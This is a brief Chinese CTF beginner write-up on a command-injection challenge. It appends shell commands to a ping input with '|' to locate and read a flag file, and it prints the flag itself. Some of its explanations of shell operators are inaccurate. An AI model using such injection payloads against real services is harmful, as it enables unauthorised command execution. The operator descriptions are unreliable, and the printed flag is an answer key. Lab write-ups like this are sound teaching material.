CTF新手区 aconmand_execution
原理
【管道符】Windows或Linux下的命令行:
命令1 && 命令2:先执行命令1,如果为真,再执行命令2
命令1 || 命令2:先执行命令1,如果为假,再执行命令2
命令1 & 命令2:先执行命令2 ,后执行命令1
命令1 | 命令2:只执行命令2
过程
- 输入一个地址“127.0.0.1”,ping一下:
- 可以看到下面的信息,联想到是否可以用管道符执行命令搜索flag的位置
127.0.0.1 | find / -name flag.xxx
:
- 找到了flag的位置,继续用cat来读取flag的信息
127.0.0.1 | cat /home/flag.txt
:
- 找到flag:
cyberpeace{8c9eeee21bdc0348a379e15e56c525a9}